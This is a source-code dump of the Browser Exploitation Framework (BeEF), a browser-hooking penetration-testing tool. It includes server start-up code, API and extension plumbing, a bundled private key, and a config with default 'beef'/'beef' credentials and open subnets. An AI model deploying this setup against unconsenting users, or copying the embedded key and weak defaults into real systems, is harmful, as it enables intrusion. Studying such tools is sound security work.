print_error("Could not update '#{db_file}' database file: #{e.message}")
exit(1)
end
#
# @note Create HTTP Server and prepare it to run
#
http_hook_server = BeEF::Core::Server.instance
http_hook_server.prepare
begin
BeEF::Core::Logger.instance.register('System', 'BeEF server started')
rescue => e
print_error("Database connection failed: #{e.message}")
exit(1)
end
#
# @note Prints information back to the user before running the server
#
BeEF::Core::Console::Banners.print_loaded_extensions
BeEF::Core::Console::Banners.print_loaded_modules
BeEF::Core::Console::Banners.print_network_interfaces_count
BeEF::Core::Console::Banners.print_network_interfaces_routes
BeEF::Core::Console::Banners.print_http_proxy
BeEF::Core::Console::Banners.print_dns
#
# @note Prints the API key needed to use the RESTful API
#
print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
#
# @note Load the GeoIP database
#
BeEF::Core::GeoIp.instance
#
# @note Call the API method 'pre_http_start'
#
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
#
# @note Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory
#
BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory
#
# @note Start the WebSocket server
#
if config.get("beef.http.websocket.enable")
BeEF::Core::Websocket::Websocket.instance
BeEF::Core::Console::Banners.print_websocket_servers
end
#
# @note Start HTTP server
#
print_info 'BeEF server started (press control+c to stop)'
http_hook_server.start
================================================
FILE: beef_cert.pem
================================================
-----BEGIN CERTIFICATE-----
MIIECTCCAnGgAwIBAgIUbx/YybkSOL8uO0qikl/wsL4xLeIwDQYJKoZIhvcNAQEL
BQAwFDESMBAGA1UEAwwJbG9jYWxob3N0MB4XDTE5MDIxNjEzMjYxNFoXDTI5MDIx
MzEzMjYxNFowFDESMBAGA1UEAwwJbG9jYWxob3N0MIIBojANBgkqhkiG9w0BAQEF
AAOCAY8AMIIBigKCAYEAteQJ2fooOffGU8jFkArCsFaJZW5WSuc5j7i2ciG0LY2C
lVg1Uy7/6xHe048RJAD9AnWajf9Jt7NpAAoyRmFJOepZS8CStON4mBrKUFI4rzAB
W9F7nov5+k+GK11kuvPFyAQCGs82RpGXsEP2ktsimsWvI8jnt7B+DXltqxeWavXB
TYOTsDhyRxXcNPGgenOabtya1XsAecTs4JPOsV4L/hnTS70X8BNOcMRFRNb3W5C0
w3vnid9Q6jhDRC6ghpeVWgnlymqV0Y6v1pbWZRs71sKQF/V5Td5zA8pr9r30YFAD
Wbkb33vicU5BkZ8PQeUygqtqKOhni9i8Yg1otkXmqWsmo5sV/GgKHvkxOoQBlzv3
hhMyYEnKjhPuepKl/VW17zRFdMCQZbvtW9/WBX4AwtKNAxYiRRO5jvDU1pX0nfXw
86ZPfkbkPdJJYqZqqsOSSOVSpCkoLJv/owaY10XwgSEl8rA+3t03/9B6s09Q0o28
0zXu/CMiSBNSEJlJSNdZAgMBAAGjUzBRMB0GA1UdDgQWBBTULhamHun+PWMkHDzg
5yHcv0KOmTAfBgNVHSMEGDAWgBTULhamHun+PWMkHDzg5yHcv0KOmTAPBgNVHRMB
Af8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBgQAZo9xPTktJ1aTxTXfLKivqbPin
5CiRl5DWh1niPUFowmuAGbDCYOHA/+fzhBhFWj3LVaX2dQSpYxiqnfb5FWaxNK+8
9A0AKgf8f2cpJ22QleDFOsyCw8jxzSfmOKKQLifY5Ty5C5P8xb9T0B7LbyR8r17p
sr77eM/5tBpsIIh40AZjoDhi/HHrtqxEb+DgnTRHIBMmzvwkk+v4iXBDCO5BHFof
gVXOF3MrovhH+qA8HFl9diJ6MtTltVAqI0eShBLd2MJ068qKqb+I6pyXGmlrk9Ei
H0XrKlKEKjyum6ZEPr5Mn+NA+4ePRv1mPHoaopJoNhgRislfryGFLJwxeuMJfQOU
oZTmgK8Ur0TYLl/wqf9avX3A8hkffNZXukmzNwjzLVG252RPA2Iq3y1+7VgOjaBJ
rNbwArYInhfF5hJesjo3LAD9H29dFxR6dztpOcDCkaOZEdlz+fvqUFYJzwuHmuSi
DLyqAOr77CjoWEMSHcXUEGUeJDKVqLgzqC9lqf4=
-----END CERTIFICATE-----
================================================
FILE: beef_key.pem
================================================
-----BEGIN PRIVATE KEY-----
MIIG/gIBADANBgkqhkiG9w0BAQEFAASCBugwggbkAgEAAoIBgQC15AnZ+ig598ZT
yMWQCsKwVollblZK5zmPuLZyIbQtjYKVWDVTLv/rEd7TjxEkAP0CdZqN/0m3s2kA
CjJGYUk56llLwJK043iYGspQUjivMAFb0Xuei/n6T4YrXWS688XIBAIazzZGkZew
Q/aS2yKaxa8jyOe3sH4NeW2rF5Zq9cFNg5OwOHJHFdw08aB6c5pu3JrVewB5xOzg
k86xXgv+GdNLvRfwE05wxEVE1vdbkLTDe+eJ31DqOENELqCGl5VaCeXKapXRjq/W
ltZlGzvWwpAX9XlN3nMDymv2vfRgUANZuRvfe+JxTkGRnw9B5TKCq2oo6GeL2Lxi
DWi2ReapayajmxX8aAoe+TE6hAGXO/eGEzJgScqOE+56kqX9VbXvNEV0wJBlu+1b
39YFfgDC0o0DFiJFE7mO8NTWlfSd9fDzpk9+RuQ90klipmqqw5JI5VKkKSgsm/+j
BpjXRfCBISXysD7e3Tf/0HqzT1DSjbzTNe78IyJIE1IQmUlI11kCAwEAAQKCAYA6
mX87BMcU9eilcZeEspLKsPaPAR83/oqi7QWKe6VKz750UvjLFedJWnaJfhwtl0vs
EOt8N/UOA/UeGCreVdV7nS6rox0gvfBKQMdRXUv51ON7K2BCUiJ1LE2zhuE/Ae6E
ZBYxgPShg6J1HVBBO+xIJMwqIT3WBjx2JtrYNj81sntWd7+LFIRstnQ9cmMbUEc+
1D/l6zzZ/kG6kKQUrJH8iWFzkzY1GGM7HWCbrw3+J/60xCRyXMn6y6mQO91nv0nJ
heir6gmTIdjM7E6wDCsdLOiziKAZlWI3RkEm+Jag0JEYqlzk1XWaiqHav2Oa8eCU
Cbo8yst+PpxJoa1I7rSYZkt+7m+hdhVCWwvFCSRnAyVowpDrjL4SBazn61wvOWVs
jeLrHtP8HlGGHdcpLDGVPsp3mXIjgDPcx+22E+Qk7wWnedi22ZSxQMxwQDt/LMiB
JtAalaZfYmc5+QowCZfTlpO93wvJYalqobFag3YzAv0879VsKtrnjiutcL0BJgEC
gcEA4nrqVAumNscnIs7keONkvpTHWABRXX864nLKC+hoyACbDdlakPlo6qxULovE
CjGhTBG819D6q+VBvwE2uXlKoxh+guilUO0j2M3uj/8OjQDH1ICO2CYyNKuduHly
Tdn5PIADhpGRM3TXTCpg0P1WS2ql53Qt0HJ1Ae1GU9mz67+lXLbEGVnDUCQ8eOrj
nCCsbEc50GFlXHgL6w5wjlJ8RUGuOsJJbGtnb2Ed5UofXS1zuldvlGqUVcB/L8Ve
1O05AoHBAM2ZSS7/G96i0kPuBWo1CZbnzVoR9/ilsLCZ/2hmdsvZiFbK9Fx5Fb1u
4LAZsPznMya2mmVgK3Y5CzuNT86IHGMdPJ2bJ2n2Pz1QdRRVEFTNpaS4kY/IG2hS
6pOVxPS+lahC012WhyzRYmSW0MIaJ6XvjpGntIXd+LYYQnb6sSeKVhVgsILxf8Hk
TMXiR/GCbpSIWrhPD4BHLcqKhja32dL9YAuzi9xAQ4Ccavz1AqCZJat3rR13Vce6
jB+arptbIQKBwEHG5SvHvlyGds1bPWwGzwmy+DqMzRTUkOuX3yqaM2RzGJVrHSyh
42DU8BYcrbEwPOJ0/F3J6iPmj7PDzHsNySmZQZUPsIPSe+jJ1pGnyDgXk/IZ7GLG
pSo69bHQQ+xsdECoBV4eBQfm1WjfngLUsS1yKgEQ8wVpWKZYnWZZAjJkFMjapBWg
xmMOQynzPmvn6WwBO79Tqjay/vMj3HjZaBJNQyb5qo18nCvzDtW7M2TCgKwMHPIE
ClTldYsQTbyVsQKBwQC0fgNPbMpMs2ggFo9OY+1dO3Z9whSNhvgMscUVJA7aeshE
WbwYinxZZ0N9lbBY9adkLx5wLPM6wG1qBG6xg7BYGsyiGBmL3pA6Ba4jAWJq8Hag
mx++uA/HkDM7CVp0+fNsWe4w1Psqj07vu67dGBUCicIBgNbsRqgXREjlJsPrUHiu
H8oVymk8EG6Nsk8yaC0n3GS4NUAIf3RlwSJ+WvyxS5rL6v23h/s6pxcNpxJ9ZrU5
SMEDg0YdJ1noTOVIocECgcEAhMQBUdV0qHrrGyCpsnoRVFaUMi+/+TNjJnStlerj
KjphQa+J+pvuwzAyu82zFX+6BPsnq9ZvYIBChb6WxjVu+ucIr4A79WrZ7ZpChi00
64+mU6woATLOcxLIKNSakFOEjubnLoU/orp1CoWUW1tHv7FPO6PaJNi8wuYE3NEv
j8U27RLwdnqJKUPJ9Tjc7LQd1Hk9UT9BK6EVfxSpy0ybquhJstJX9oa7jihHxcqE
jyItP2FJBbw7BlIq7t2c2G66
-----END PRIVATE KEY-----
================================================
FILE: conf.json
================================================
{
"source": {
"include": ["./core/main/client"],
"includePattern": ".js$"
},
"plugins": [
"plugins/markdown"
],
"opts": {
"encoding": "utf8",
"readme": "./README.md",
"destination": "docs/",
"recurse": true,
"verbose": true
}
}
================================================
FILE: config.yaml
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
version: '0.6.0.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin interface
credentials:
user: "beef"
passwd: "beef"
# Interface / IP restrictions
restrictions:
# subnet of IP addresses that can hook to the framework
permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that can connect to the admin UI
#permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
# subnet of IP addresses that cannot be hooked by the framework
excluded_hooking_subnet: []
# slow API calls to 1 every api_attempt_delay seconds
api_attempt_delay: "0.05"
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting to 1,000 (ms) if you want more responsiveness
# when sending modules and retrieving results.
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 1000
# Public Domain Name / Reverse Proxy / Port Forwarding
#
# In order for the client-side BeEF JavaScript hook to be able to connect to BeEF,
# the hook JavaScript needs to be generated with the correct connect-back details.
#
# If you're using a public domain name, reverse proxy, or port forwarding you must
# configure the public-facing connection details here.
#public:
# host: "beef.local" # public hostname/IP address
# port: "443" # public port (443 if the public server is using HTTPS)
# https: false # true/false
# If using any reverse proxy you should also set allow_reverse_proxy to true below.
# Note that this causes the BeEF server to trust the X-Forwarded-For HTTP header.
# If the BeEF server is directly accessible, clients can spoof their connecting
# IP address using this header to bypass the IP address permissions/exclusions.
allow_reverse_proxy: false
# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
# Allow one or multiple origins to access the RESTful API using CORS
# For multiple origins use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
port: 61985 # WS: good success rate through proxies
# Use encrypted 'WebSocketSecure'
# NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
secure: true
secure_port: 61986 # WSSecure
ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.public (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
database:
file: "beef.db"
# Autorun Rule Engine
autorun:
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
# IP Geolocation
geoip:
enable: true
# GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
# You may override default extension configuration parameters here
# Note: additional experimental extensions are available in the 'extensions' directory
# and can be enabled via their respective 'config.yaml' file
extension:
admin_ui:
enable: true
base_path: "/ui"
demos:
enable: true
events:
enable: true
evasion:
enable: false
requester:
enable: true
proxy:
enable: true
network:
enable: true
metasploit:
enable: false
social_engineering:
enable: false
xssrays:
enable: true
================================================
FILE: core/api/extension.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Extension
attr_reader :full_name, :short_name, :description
@full_name = ''
@short_name = ''
@description = ''
end
end
end
================================================
FILE: core/api/extensions.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Extensions
# @note Defined API Paths
API_PATHS = {
'post_load' => :post_load
}.freeze
# API hook fired after all extensions have been loaded
def post_load; end
end
end
end
================================================
FILE: core/api/main/configuration.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Configuration
# @note Defined API Paths
API_PATHS = {
'module_configuration_load' => :module_configuration_load
}.freeze
# Fires just after module configuration is loaded and merged
# @param [String] mod module key
def module_configuration_load(mod); end
end
end
end
================================================
FILE: core/api/main/migration.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Migration
# @note Defined API Paths
API_PATHS = {
'migrate_commands' => :migrate_commands
}.freeze
# Fired just after the migration process
def migrate_commands; end
end
end
end
================================================
FILE: core/api/main/network_stack/assethandler.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module NetworkStack
module Handlers
module AssetHandler
# Binds a file to be accessible by the hooked browser
# @param [String] file file to be served
# @param [String] path URL path to be bound, if no path is specified a randomly generated one will be used
# @param [String] extension to be used in the URL
# @param [Integer] count amount of times the file can be accessed before being automatically unbound. (-1 = no limit)
# @return [String] URL bound to the specified file
# @todo Add hooked browser parameter to only allow specified hooked browsers access to the bound URL. Waiting on Issue #336
# @note This is a direct API call and does not have to be registered to be used
def self.bind(file, path = nil, extension = nil, count = -1)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Unbinds a file made accessible to hooked browsers
# @param [String] url the bound URL
# @todo Add hooked browser parameter to only unbind specified hooked browsers binds. Waiting on Issue #336
# @note This is a direct API call and does not have to be registered to be used
def self.unbind(url)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind(url)
end
end
end
end
end
end
================================================
FILE: core/api/main/server/hook.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Server
module Hook
# @note Defined API Paths
API_PATHS = {
'pre_hook_send' => :pre_hook_send
}.freeze
# Fires just before the hook is sent to the hooked browser
# @param [Class] handler the associated handler Class
def pre_hook_send(handler); end
end
end
end
end
================================================
FILE: core/api/main/server.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Server
# @note Defined API Paths
API_PATHS = {
'mount_handler' => :mount_handler,
'pre_http_start' => :pre_http_start
}.freeze
# Fires just before the HTTP Server is started
# @param [Object] http_hook_server HTTP Server object
def pre_http_start(http_hook_server); end
# Fires just after handlers have been mounted
# @param [Object] server HTTP Server object
def mount_handler(server); end
# Mounts a handler
# @param [String] url URL to be mounted
# @param [Class] http_handler_class the handler Class
# @param [Array] args an array of arguments
# @note This is a direct API call and does not have to be registered to be used
def self.mount(url, http_handler_class, args = nil)
BeEF::Core::Server.instance.mount(url, http_handler_class, *args)
end
# Unmounts a handler
# @param [String] url URL to be unmounted
# @note This is a direct API call and does not have to be registered to be used
def self.unmount(url)
BeEF::Core::Server.instance.unmount(url)
end
end
end
end
================================================
FILE: core/api/module.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Command
end
module Module
# @note Defined API Paths
API_PATHS = {
'pre_soft_load' => :pre_soft_load,
'post_soft_load' => :post_soft_load,
'pre_hard_load' => :pre_hard_load,
'post_hard_load' => :post_hard_load,
'get_options' => :get_options,
'get_payload_options' => :get_payload_options,
'override_execute' => :override_execute
}.freeze
# Fired before a module soft load
# @param [String] mod module key of module about to be soft loaded
def pre_soft_load(mod); end
# Fired after module soft load
# @param [String] mod module key of module just after soft load
def post_soft_load(mod); end
# Fired before a module hard load
# @param [String] mod module key of module about to be hard loaded
def pre_hard_load(mod); end
# Fired after module hard load
# @param [String] mod module key of module just after hard load
def post_hard_load(mod); end
# Fired before standard module options are returned
# @return [Hash] a hash of options
# @note the option hash is merged with all other API hook's returned hash. Hooking this API method prevents the default options being returned.
def get_options; end
# Fired just before a module is executed
# @param [String] mod module key
# @param [String] hbsession hooked browser session id
# @param [Hash] opts a Hash of options
# @note Hooking this API method stops the default flow of the Module.execute() method.
def override_execute(mod, hbsession, opts); end
# Fired when retreiving dynamic payload
# @return [Hash] a hash of options
# @note the option hash is merged with all other API hook's returned hash. Hooking this API method prevents the default options being returned.
def get_payload_options; end
end
end
end
================================================
FILE: core/api/modules.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
module Modules
# @note Defined API Paths
API_PATHS = {
'post_soft_load' => :post_soft_load
}.freeze
# Fires just after all modules are soft loaded
def post_soft_load; end
end
end
end
================================================
FILE: core/api.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module API
#
# Registrar class to handle all registered timed API calls
#
class Registrar
include Singleton
#
# Create registrar
#
def initialize
@registry = []
@count = 1
end
# Register timed API calls to an owner
#
# @param [Class] owner the owner of the API hook
# @param [Class] clss the API class the owner would like to hook into
# @param [String] method the method of the class the owner would like to execute
# @param [Array] params an array of parameters that need to be matched before the owner will be called
#
def register(owner, clss, method, params = [])
unless verify_api_path(clss, method)
print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}"
return
end
if registered?(owner, clss, method, params)
print_debug "API Registrar: Attempting to re-register API call #{clss} :#{method}"
return
end
id = @count
@registry << {
'id' => id,
'owner' => owner,
'class' => clss,
'method' => method,
'params' => params
}
@count += 1
id
end
#
# Tests whether the owner is registered for an API hook
#
# @param [Class] owner the owner of the API hook
# @param [Class] clss the API class
# @param [String] method the method of the class
# @param [Array] params an array of parameters that need to be matched
#
# @return [Boolean] whether or not the owner is registered
#
def registered?(owner, clss, method, params = [])
@registry.each do |r|
next unless r['owner'] == owner
next unless r['class'] == clss
next unless r['method'] == method
next unless is_matched_params? r, params
return true
end
false
end
#
# Match a timed API call to determine if an API.fire() is required
#
# @param [Class] clss the target API class
# @param [String] method the method of the target API class
# @param [Array] params an array of parameters that need to be matched
#
# @return [Boolean] whether or not the arguments match an entry in the API registry
#
def matched?(clss, method, params = [])
@registry.each do |r|
next unless r['class'] == clss
next unless r['method'] == method
next unless is_matched_params? r, params
return true
end
false
end
#
# Un-registers an API hook
#
# @param [Integer] id the ID of the API hook
#
def unregister(id)
@registry.delete_if { |r| r['id'] == id }
end
#
# Retrieves all the owners and ID's of an API hook
# @param [Class] clss the target API class
# @param [String] method the method of the target API class
# @param [Array] params an array of parameters that need to be matched
#
# @return [Array] an array of hashes consisting of two keys :owner and :id
#
def get_owners(clss, method, params = [])
owners = []
@registry.each do |r|
next unless r['class'] == clss
next unless r['method'] == method
next unless is_matched_params? r, params
owners << { owner: r['owner'], id: r['id'] }
end
owners
end
#
# Verifies that the api_path has been regitered
# Verifies the API path has been registered.
#
# @note This is a security precaution
#
# @param [Class] clss the target API class to verify
# @param [String] mthd the target method to verify
#
def verify_api_path(clss, mthd)
(clss.const_defined?('API_PATHS') && clss.const_get('API_PATHS').key?(mthd))
end
#
# Retrieves the registered symbol reference for an API hook
#
# @param [Class] clss the target API class to verify
# @param [String] mthd the target method to verify
#
# @return [Symbol] the API path
#
def get_api_path(clss, mthd)
verify_api_path(clss, mthd) ? clss.const_get('API_PATHS')[mthd] : nil
end
#
# Matches stored API params to params
#
# @note If a stored API parameter has a NilClass the parameter matching is skipped for that parameter
# @note By default this method returns true, this is either because the API.fire() did not include any parameters or there were no parameters defined for this registry entry
#
# @param [Hash] reg hash of registry element, must contain 'params' key
# @param [Array] params array of parameters to be compared to the stored parameters
#
# @return [Boolean] whether params matches the stored API parameters
#
def is_matched_params?(reg, params)
stored = reg['params']
return true unless stored.length == params.length
stored.each_index do |i|
next if stored[i].nil?
return false unless stored[i] == params[i]
end
true
end
#
# Fires all owners registered to this API hook
#
# @param [Class] clss the target API class
# @param [String] mthd the target API method
# @param [Array] *args parameters passed for the API call
#
# @return [Hash, NilClass] returns either a Hash of :api_id and :data
# if the owners return data, otherwise NilClass
#
def fire(clss, mthd, *args)
mods = get_owners(clss, mthd, args)
return nil unless mods.length.positive?
unless verify_api_path(clss, mthd) && clss.ancestors.first.to_s.start_with?('BeEF::API')
print_error "API Path not defined for Class: #{clss} method: #{mthd}"
return []
end
data = []
method = get_api_path(clss, mthd)
mods.each do |mod|
# Only used for API Development (very verbose)
# print_info "API: #{mod} fired #{method}"
result = mod[:owner].method(method).call(*args)
data << { api_id: mod[:id], data: result } unless result.nil?
rescue StandardError => e
print_error "API Fire Error: #{e.message} in #{mod}.#{method}()"
end
data
end
end
end
end
require 'core/api/module'
require 'core/api/modules'
require 'core/api/extension'
require 'core/api/extensions'
require 'core/api/main/migration'
require 'core/api/main/network_stack/assethandler'
require 'core/api/main/server'
require 'core/api/main/server/hook'
require 'core/api/main/configuration'
================================================
FILE: core/bootstrap.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
end
end
## @note Include the BeEF router
require 'core/main/router/router'
require 'core/main/router/api'
## @note Include http server functions for beef
require 'core/main/server'
require 'core/main/handlers/modules/beefjs'
require 'core/main/handlers/modules/legacybeefjs'
require 'core/main/handlers/modules/multistagebeefjs'
require 'core/main/handlers/modules/command'
require 'core/main/handlers/commands'
require 'core/main/handlers/hookedbrowsers'
require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/handlers/redirector'
require 'core/main/network_stack/handlers/raw'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
# @note Include the autorun engine
require 'core/main/autorun_engine/parser'
require 'core/main/autorun_engine/engine'
require 'core/main/autorun_engine/rule_loader'
## @note Include helpers
require 'core/module'
require 'core/modules'
require 'core/extension'
require 'core/extensions'
require 'core/hbmanager'
## @note Include RESTful API
require 'core/main/rest/handlers/hookedbrowsers'
require 'core/main/rest/handlers/browserdetails'
require 'core/main/rest/handlers/modules'
require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/handlers/server'
require 'core/main/rest/handlers/autorun_engine'
require 'core/main/rest/api'
## @note Include Websocket
require 'core/main/network_stack/websocket/websocket'
================================================
FILE: core/core.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
end
end
# @note Includes database models - the order must be consistent otherwise DataMapper goes crazy
require 'core/main/model'
require 'core/main/models/commandmodule'
require 'core/main/models/hookedbrowser'
require 'core/main/models/log'
require 'core/main/models/command'
require 'core/main/models/result'
require 'core/main/models/optioncache'
require 'core/main/models/browserdetails'
require 'core/main/models/rule'
require 'core/main/models/execution'
require 'core/main/models/legacybrowseruseragents'
# @note Include the constants
require 'core/main/constants/browsers'
require 'core/main/constants/commandmodule'
require 'core/main/constants/os'
require 'core/main/constants/hardware'
# @note Include core modules for beef
require 'core/main/configuration'
require 'core/main/command'
require 'core/main/crypto'
require 'core/main/logger'
require 'core/main/migration'
require 'core/main/geoip'
# @note Include the command line parser and the banner printer
require 'core/main/console/commandline'
require 'core/main/console/banners'
================================================
FILE: core/extension.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
# Checks to see if extension is set inside the configuration
# @param [String] ext the extension key
# @return [Boolean] whether or not the extension exists in BeEF's configuration
def self.is_present(ext)
BeEF::Core::Configuration.instance.get('beef.extension').key? ext.to_s
end
# Checks to see if extension is enabled in configuration
# @param [String] ext the extension key
# @return [Boolean] whether or not the extension is enabled
def self.is_enabled(ext)
return false unless is_present(ext)
BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.enable") == true
end
# Checks to see if extension has been loaded
# @param [String] ext the extension key
# @return [Boolean] whether or not the extension is loaded
def self.is_loaded(ext)
return false unless is_enabled(ext)
BeEF::Core::Configuration.instance.get("beef.extension.#{ext}.loaded") == true
end
# Loads an extension
# @param [String] ext the extension key
# @return [Boolean] whether or not the extension loaded successfully
def self.load(ext)
if File.exist? "#{$root_dir}/extensions/#{ext}/extension.rb"
require "#{$root_dir}/extensions/#{ext}/extension.rb"
print_debug "Loaded extension: '#{ext}'"
BeEF::Core::Configuration.instance.set "beef.extension.#{ext}.loaded", true
return true
end
print_error "Unable to load extension '#{ext}'"
false
rescue StandardError => e
print_error "Unable to load extension '#{ext}':"
print_more e.message
end
end
end
================================================
FILE: core/extensions.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extensions
# Returns configuration of all enabled extensions
# @return [Array] an array of extension configuration hashes that are enabled
def self.get_enabled
BeEF::Core::Configuration.instance.get('beef.extension').select { |_k, v| v['enable'] == true }
rescue StandardError => e
print_error "Failed to get enabled extensions: #{e.message}"
print_error e.backtrace
end
# Returns configuration of all loaded extensions
# @return [Array] an array of extension configuration hashes that are loaded
def self.get_loaded
BeEF::Core::Configuration.instance.get('beef.extension').select { |_k, v| v['loaded'] == true }
rescue StandardError => e
print_error "Failed to get loaded extensions: #{e.message}"
print_error e.backtrace
end
# Load all enabled extensions
# @note API fire for post_load
def self.load
BeEF::Core::Configuration.instance.load_extensions_config
get_enabled.each do |k, _v|
BeEF::Extension.load k
end
# API post extension load
BeEF::API::Registrar.instance.fire BeEF::API::Extensions, 'post_load'
rescue StandardError => e
print_error "Failed to load extensions: #{e.message}"
print_error e.backtrace
end
end
end
================================================
FILE: core/filters/base.rb
================================================
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Filters
# Check if the string is not empty and not nil
# @param [String] str String for testing
# @return [Boolean] Whether the string is not empty
def self.is_non_empty_string?(str)
return false if str.nil?
return false unless str.is_a? String
return false if str.empty?
true
end
# Check if only the characters in 'chars' are in 'str'
# @param [String] chars List of characters to match
# @param [String] str String for testing
# @return [Boolean] Whether or not the only characters in str are specified in chars
def self.only?(chars, str)
regex = Regexp.new('[^' + chars + ']')
regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
end
# Check if one or more characters in 'chars' are in 'str'
# @param [String] chars List of characters to match
# @param [String] str String for testing
# @return [Boolean] Whether one of the characters exists in the string
def self.exists?(chars, str)
regex = Regexp.new(chars)
!regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
end
# Check for null char
# @param [String] str String for testing
# @return [Boolean] If the string has a null character
def self.has_null?(str)
return false unless is_non_empty_string?(str)
exists?('\x00', str)
end
# Check for non-printable char
# @param [String] str String for testing
# @return [Boolean] Whether or not the string has non-printable characters
def self.has_non_printable_char?(str)
return false unless is_non_empty_string?(str)
!only?('[:print:]', str)
end
# Check if num characters only
